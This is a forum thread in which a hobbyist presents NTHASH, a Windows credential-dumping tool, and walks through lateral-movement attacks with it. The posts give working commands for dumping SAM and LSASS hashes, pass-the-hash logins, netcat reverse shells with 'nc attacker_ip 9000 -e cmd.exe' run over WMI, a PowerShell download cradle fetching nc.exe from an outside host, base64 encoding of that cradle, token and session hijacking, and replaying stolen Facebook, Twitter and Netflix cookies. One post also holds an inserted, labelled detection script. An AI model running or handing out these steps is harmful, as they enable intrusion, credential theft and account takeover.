
NTHASH - playing with windows hashes and passwords

security passwords hash ntlm

10 replies to this topic

#1 erwan.l

erwan.l

    Platinum Member

  • Developer
  • 3041 posts
  • Location:Nantes - France
  •  
    France

Posted 08 October 2019 - 04:55 PM

Hello Gents,
 
For once I will step a bit from network and storage discussions/tools and will get into the security world.
 
I consider myself a security hobbyist/amateur and I have been willing to explore and improve my skills around hash (md5, sha, etc) and crypto functions (rc4, aes, 3des, etc).
 
I decided then to start playing with windows passwords as obviously MS puts great efforts in protecting these.
How are they stored, how can we decrypt them, etc.
 
I started with one common way, i.e. patching LSASS to dump hashes.
While rather easy, patching lsass is always risky, OS dependent and not telling much about how passwords are encrypted.
Thus, doing so, I stumbled on a way (google) to change a password if you know the hash only, which in some cases (pentests) may come in handy.
 
While playing with lsass, I took a look at the logon and wdigest data stored in the memory.
Here again, it is an "easy" way to retrieve passwords (some in clear text, some in hashes).
One very cool feature there is the ability to "patch" a logon session with some hashes you found previously and therefore perform what is known as a "pass the hash" attack.
You don't know the password? No problem, launch a process under someone else's account using the hash of his password (which combined with mstsc /restrictedadmin can help you escalate your privileges).
Lots of security guys are warning these days that the complexity of your password no longer matters : true, the security of your password hash is what does matter.
I won't touch here on capturing hashes over the network (using MITM, poisoning, etc) but that could lead to another interesting thread.
 
I then took a look at the registry.
It gets trickier here as you need a samkey, a syskey, while also using hash/encryption algos.
You want to see how it works under the hood : read this great article.
 
Since on my way to use windows builtin crypt functions, I took a look at cryptunprotectdata which ultimately should lead me to decrypt windows credentials.
 
Talking about credentials, you can again patch lsass to force it to dump its passwords in clear text.
 
Last but not least, because you sometimes need to impersonate another account/context to perform some actions, I took a quick tour around runastoken, runaschild....
 
This is only the beginning of my journey.
And for once, the journey is what matters to me here, not the destination :)
 
The source is available to all.
Binaries (x32/x64) are zipped.
This is early work : I have been testing this on win7, win8.1, win10.
In case Wonko passes by : some functions will work on xp and last time I tested it, it was running fine  B)
 
If you are not into security, don't bother with this tool : it will at best bore you, at worst BSOD your windows.
If you are a pseudo hacker willing to hack his GF's laptop, please, ignore me.
If you are a security hobbyist/amateur and have ideas and want to develop some features, let's be friends !
 
Before I forget : it is all on my github here (with some extra details).
 
Also, I did not invent any of it : I reused lots of tips, tricks, knowledge from fantastic guys out there willing to share and document.
Tool was also greatly inspired by Mimikatz : possibly one of the most powerful and challenging tools these last years ... and developed by another frenchie ;)
 
Cheers,
Erwan


#2 erwan.l


Posted 08 October 2019 - 06:37 PM

command line.

 

Command line as below:

NTHASH /setntlm [/server:hostname] /user:username /newhash:xxx
NTHASH /setntlm [/server:hostname] /user:username /newpwd:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldpwd:xxx /newpwd:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldhash:xxx /newpwd:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldpwd:xxx /newhash:xxx
NTHASH /changentlm [/server:hostname] /user:username /oldhash:xxx /newhash:xxx
NTHASH /gethash /password:password
NTHASH /getsid /user:username [/server:hostname]
NTHASH /getusers [/server:hostname]
NTHASH /getdomains [/server:hostname]
NTHASH /dumpsam
NTHASH /dumphashes [/offline]
NTHASH /getsyskey [/offline]
NTHASH /getsamkey [/offline]
NTHASH /getlsakeys
NTHASH /wdigest
NTHASH /logonpasswords
NTHASH /pth /user:username /password:myhash /domain:mydomain
NTHASH /enumcred
NTHASH /enumcred2
NTHASH /enumvault
NTHASH /chrome [/binary:path_to_database]
NTHASH /ccookies [/binary:path_to_database]
NTHASH /firefox [/binary:path_to_database]
NTHASH /fcookies [/binary:path_to_database]
NTHASH /bytetostring /input:hexabytes
NTHASH /stringtobyte /input:string
NTHASH /base64encodew /input:string
NTHASH /base64encode /input:string
NTHASH /base64decode /input:base64string
NTHASH /cryptunprotectdata /binary:filename
NTHASH /cryptunprotectdata /input:string
NTHASH /cryptprotectdata /input:string
NTHASH /runasuser /user:username /password:password [/binary:x:\folder\bin.exe]
NTHASH /runastoken /pid:12345 [/binary:x:\folder\bin.exe]
NTHASH /runaschild /pid:12345 [/binary:x:\folder\bin.exe]
NTHASH /runas [/binary:x:\folder\bin.exe]
NTHASH /runts /user:session_id [/binary:x:\folder\bin.exe]
NTHASH /enumpriv
NTHASH /enumproc
NTHASH /dumpproc /pid:12345
NTHASH /runwmi /binary:x:\folder\bin.exe [/server:hostname]
NTHASH /context
NTHASH /a_command /verbose
NTHASH /a_command /system


#3 erwan.l


Posted 31 October 2019 - 05:28 PM

Demonstrating lateral movement with NTHASH part #1

 

In 3 steps, let's retrieve some hashes and then let's perform a PTH (using MS RDP client).

If you don't know what lateral movement is, please read here.

 

1. Retrieve the hash


NTHASH-win64.exe /dumpsam
or
NTHASH-win64.exe /dumphashes /system
or
reg save hklm\sam sam.sav and reg save hklm\system system.sav
NTHASH-win64.exe /dumphashes /offline
or (in a domain env)
NTHASH-win64.exe /logonpasswords

 

2. Pass the hash


NTHASH-win64.exe /pth /user:username /password:8846F7EAEE8FB117AD06BDD830B7586C /domain:.

 

3. In the newly opened cmd « pth » shell, type mstsc /restrictedadmin /v:target

 

You will end up logged in as the « username » account in an RDP console on the server named « target ».

 

Try a simple whoami for fun and go back to credential harvesting for this account using /firefox, /chrome, /enumvault, /enumcred, etc.

 

And you never had to enter the account password…

 

Note that any other client tool (preferably built in windows) that inherits ntlm credentials from the current logon session will work too (tasklist/taskkill, wmic, net, winrm/powershell, psexec, etc).

 

This will be covered in future posts.



#4 erwan.l


Posted 31 October 2019 - 05:28 PM

Demonstrating lateral movement with NTHASH part #2

 

In a previous post, we have seen how to perform lateral movement thru « Pass The Hash ».

Let's imagine that there is no RDP server available on the target but you still need to get a shell on the target.

Let's use a reverse shell, i.e. the target will connect back to us (the attacker).

Useful as well if the firewall on the target is allowing only outbound connections.

 

1. Set a shell with netcat on the attacker host
nc -L -vv -p 9000

 

2. Copy file to target host (remember, you are using a pth shell with proper logon details).
copy nc.exe \\target\admin$

 

3. Exec netcat on target host
NTHASH-win64.exe /runwmi /server:target /binary:nc attacker_ip 9000 -e cmd.exe

 

At this point you will get a shell popup in your listening netcat.

Try a simple whoami for fun.



#5 erwan.l


Posted 31 October 2019 - 05:28 PM

Demonstrating lateral movement with NTHASH part #3

 

Let's introduce a variant of the previous post.

Rather than copying a file to a target using a remote admin$ share (which is not always available), let's have the target download a file via http.

 

1. Set a shell with netcat on the attacker host
nc -L -vv -p 9000

 

2. Download a file from the internet on a remote target

(remember, you are using a pth shell with proper logon details).

NTHASH-win64.exe /runwmi /server:target /binary:powershell.exe -c (New-Object System.Net.WebClient).DownloadFile('http:%2f%2ferwan.labalec.fr%2fuploads%2fnc.exe','c:\temp\nc.exe');

 

Notice the %2f in place of the ‘/’ – indeed, we need to escape this as otherwise it would be understood as a command line parameter.

 

3. Exec netcat on target host
NTHASH-win64.exe /runwmi /server:target /binary:c:\temp\nc.exe attacker_ip 9000 -e cmd.exe

 

At this point you will get a shell popup in your listening netcat.

 

Try a simple whoami for fun.



#6 erwan.l


Posted 31 October 2019 - 05:28 PM

Demonstrating lateral movement with NTHASH part #4

 

 

Let's again introduce a variant of the previous post (still using a "pth" shell).

 

Ideally we would be using the windows built in wmic command rather than the nthash runwmi verb.

 

Unfortunately, wmic can be a pita with escaping characters in some situations, especially when combining with powershell.

 

The below for instance won't work because of the ‘,’ comma character.

wmic /node:target process call create "powershell.exe -c (New-Object System.Net.WebClient).DownloadFile(‘http://erwan.labalec...c:\temp\nc.exe')"

 

The trick/workaround is to base64encode (unicode) the powershell command.

NTHASH-win64.exe /base64encodew /input:(New-Object System.Net.WebClient).DownloadFile('http:%2f%2ferwan.labalec.fr%2fuploads%2fnc.exe','c:\temp\nc.exe');

 

Which will give you the following :

KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQ
BiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBlAHIAdwBhAG4ALgBsAGEAYgBhAGwAZQBjAC4AZgByAC8AdQBwAGwAbwBhAGQAcwAvAG4AYwAuAGUAeABlACcALAAnAGMAOgBcAHQAZQBtAHAAXABuAGMALgBlAHgAZQAnACkAOwA=

 

You can then execute a powershell command on a remote target using wmic like below :

wmic /node:target process call create "powershell.exe -encodedcommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQ

BiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBlAHIAdwBhAG4ALgBsAGEAYgBhAGwAZQBjAC4AZgByAC8AdQBwAGwAbwBhAGQAcwAvAG4AYwAuAGUAeABlACcALAAnAGMAOgBcAHQAZQBtAHAAXABuAGMALgBlAHgAZQAnACkAOwA="
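
A defender-side view of the pattern in the post above, as an added example that is not part of the original thread or of NTHASH: it triages process-creation events for PowerShell started by WMI, decodes any -EncodedCommand payload (base64 over UTF-16LE) and flags a download call inside it. The field names follow Sysmon Event ID 1; the sample events, the host example.invalid and the file names are constructed, and the marker list is an assumption to tune per environment.

```python
import base64
import binascii
import re

# "-flag value" pairs whose value looks like base64 text.
FLAG_VALUE = re.compile(r"(?<!\S)[-/](\w+)\s+([A-Za-z0-9+/=]{8,})")
DOWNLOAD_MARKERS = ("downloadfile", "downloadstring", "net.webclient")

def decode_encoded_command(cmdline):
    """Return the script carried by -EncodedCommand, or None if there is none."""
    for flag, blob in FLAG_VALUE.findall(cmdline):
        flag = flag.lower()
        # PowerShell accepts -ec and any prefix of -EncodedCommand (-e, -enc, ...).
        if flag == "ec" or "encodedcommand".startswith(flag):
            try:
                # The payload is base64 over UTF-16LE text ("unicode" in the post).
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None

def triage(event):
    """Return the findings for one process-creation event (Sysmon EID 1 fields)."""
    image = event["Image"].lower().rsplit("\\", 1)[-1]
    parent = event["ParentImage"].lower().rsplit("\\", 1)[-1]
    findings = []
    if parent == "wmiprvse.exe":  # Win32_Process.Create children run under WmiPrvSE
        findings.append("wmi-spawned")
    if image in ("powershell.exe", "pwsh.exe"):
        script = decode_encoded_command(event["CommandLine"])
        if script is not None:
            findings.append("encoded-command")
        text = (script or event["CommandLine"]).lower()
        if any(marker in text for marker in DOWNLOAD_MARKERS):
            findings.append("download-cradle")
    return findings

# Constructed sample data (not taken from the thread).
SAMPLE_SCRIPT = r"(New-Object System.Net.WebClient).DownloadFile('http://example.invalid/f.bin','c:\temp\f.bin');"
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
WMI = r"C:\Windows\System32\wbem\WmiPrvSE.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": WMI, "Image": PS,
     "CommandLine": "powershell.exe -encodedcommand " + SAMPLE_B64},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -NoProfile -Command Get-Date"},
    {"ParentImage": WMI, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c echo test > c:\temp\test.txt"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(triage(ev), ev["CommandLine"][:60])
```
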



#7 erwan.l


Posted 31 October 2019 - 05:29 PM

Demonstrating lateral movement with NTHASH part #5

 

 

In the previous post, we have introduced the use of WMIC in a « pass the hash » shell.

 

See below a list of useful wmic commands gathered around the internet:

 

rem remember impersonate is ok but delegate is not

 

rem become familiar with the available aliases
wmic alias list brief

 

rem see the available methods for any class
wmic [class] call /?

 

rem file stuff
wmic /node:target DATAFILE where "drive='c:' AND path='\\windows\\'" GET Name,readable,size
wmic /node:target datafile "c:\\temp\\test.txt" call rename c:\temp\abc.txt
wmic /node:target datafile "c:\\temp\\test.txt" call copy c:\temp\abc.txt

 

rem process stuff
wmic /node:target process call create "nc attacker-ip 9000 -e cmd.exe"
wmic /node:target process call create "cmd.exe /c echo test > c:\temp\test.txt"
wmic /node:target process where name="explorer.exe" call terminate
wmic /node:target process where processid="1234" call terminate
wmic /node:target process get name, processid

 

rem users and groups stuff
wmic /node:target USERACCOUNT LIST brief
wmic /node:target path Win32_GroupUser



#8 erwan.l


Posted 31 October 2019 - 05:29 PM

Demonstrating lateral movement with NTHASH part #6

 

Last one on the « pass the hash » series.


Initially we used a remote RDP console.

 

We then demonstrated netcat reverse shell.

 

What if we don't have RDP or can't/don't want to use netcat to the remote target?

 

WinRM to the rescue !

 

1. Ensure WinRM is set on the attacker host : winrm quickconfig

 

2. Add trusted hosts * (or filter to an ip) on attacker host : powershell "Set-Item WSMan:\localhost\Client\TrustedHosts -Value "*" -Force "

 

3. Enable psremoting on the remote target host (use wmic / see previous post) : powershell.exe "enable-psremoting -force"

 

4. Add trusted hosts * (or filter to an ip) on attacker host : powershell "Set-Item WSMan:\localhost\Client\TrustedHosts -Value "*" -Force" (use wmic / see previous post)

 

5. Enjoy a remote shell under powershell (from the attacker host) : Enter-PSSession -ComputerName target



#9 erwan.l


Posted 31 October 2019 - 05:29 PM

Demonstrating lateral movement with NTHASH part #7

 

 

In previous posts, we have used Pass The Hash to perform lateral movement.


This time, let's drop the "pass the hash" technique and use token impersonation.

Indeed, if you are lucky enough to be a local admin you can impersonate a token owned by another user currently logged on the same system as you (it could be a terminal server).

 

That other user may happen to be admin on systems where you currently don't have access to (yet).
Impersonating this user will let you perform lateral movement.

 

This is as simple as running NTHASH-win64.exe /runastoken /pid:xxx where pid is owned by that other user.

That will spawn a new shell running under the context of another user.

 

Just keep in mind that you need to be running an elevated shell to do so.
If not done yet, simply run NTHASH-win64.exe /runas before running the command above.

 

As simple as that : again, no need to know the user password (nor the hash this time).

 

Once running under the context of this other user you can then run commands like :
NTHASH-win64.exe /chrome
NTHASH-win64.exe /firefox
NTHASH-win64.exe /enumcred
NTHASH-win64.exe /enumcred2
NTHASH-win64.exe /enumvault

And keep moving lateral… or up…



#10 erwan.l


Posted 31 October 2019 - 05:29 PM

Demonstrating lateral movement with NTHASH part #8

 

In the previous post we have (ab)used windows tokens to steal someone else's account.

 

Let's see a different way to perform this task (ab)using terminal services.

 

1. Retrieve the session id of your victim with qwinsta

 

2. Open a shell (within the attacker session) to which your victim will connect : nc -L -vv -p 9000

 

3. Spawn a process within your victim session which will connect back to your shell : NTHASH-win64.exe /runts /user:session_id /binary:nc 127.0.0.1 9000 -e cmd.exe

 

And again, enjoy the output of your whoami.

 

Note that you need special privileges (SeTcbPrivilege) to perform step 3 – my preference goes to using a « trustedinstaller » session (but many other contexts will do like winlogon, etc).

 

If need be (i.e. to spawn a shell with as many privileges as possible), the below batch will create a new shell with proper privileges to perform step 3 above (although you could probably use runastoken against many of the system processes like winlogon.exe).
 

@echo off
net start trustedinstaller
for /F "tokens=1" %%K in (' nthash-win64 /enumproc ^| findstr /i "trustedinstaller" ') do ( nthash-win64 /runastoken /pid:%%K /system )


#11 erwan.l


Posted 31 October 2019 - 05:29 PM

Demonstrating lateral movement with NTHASH part #9

 

This is the 9th and last article of a series of posts around performing lateral movement.

I have been greatly inspired by this security matrix (check the lateral movement column).

 

Goal is still about performing a task as another user but without knowing that user's password.

 

This time, let's take a look at « cookies ».

 

Quoting Wikipedia : « …is a small piece of data sent from a website and stored on the user’s computer by the user’s web browser while the user is browsing… ».

 

1. Based on previous articles, let's consider you have acquired a context/shell running as another user.

 

2. Retrieve the chrome cookie you are after with NTHASH-win64.exe /ccookies | findstr /i facebook.com or the firefox cookie you are after with NTHASH-win64.exe /fcookies | findstr /i facebook.com

 

3. Launch a "blank" chrome with a blank profile (in your session) : "C:\Program Files (x86)\Google\Chrome\Application\chrome" --profile-directory= "temp"

 

4. Install a « cookie » chrome extension like EditThisCookie

 

5. Inject the cookie (with editthiscookie):

-in facebook case, you need to inject value xs and c_user
-in twitter case, you need to inject auth_token
-in netflix case, you need netflixid, securenetflixid, nfvdid, cl
etc...
 

And here you go, you can log into a web service, as another user, without knowing his credentials.

 

Note that this method may not be 100% bullet proof :
-you need to know which value(s) you need to inject
-some web services may perform extra checks (MFA, etc ...)





